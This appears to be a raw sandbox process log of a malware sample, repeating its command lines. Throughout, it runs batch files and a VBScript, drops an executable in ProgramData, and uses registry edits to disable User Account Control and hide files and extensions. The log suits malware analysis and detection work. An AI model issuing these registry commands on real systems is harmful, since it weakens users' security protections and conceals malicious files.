reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vgsccMkQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nAIAEAMU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUkQMUYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uKAgkIgc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWAYcQwo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QocIUQQs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgkMkIE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcEkowkY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fiocIogA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jSsoQoIs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jiQIMYIM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DIkAwMYo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qggEkwwk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMUUocgg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QQQcAEUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\ProgramData\eGssYows\oOQkUUEo.exe
"C:\ProgramData\eGssYows\oOQkUUEo.exe"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MqIgUUso.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wiocEAUY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ioggcosY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DWsoAkwo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nsQAgQYs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mAwQkIUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEUcQskU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyIAIMAY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bCAwUswQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nWcAAkEU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BAMwEAoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
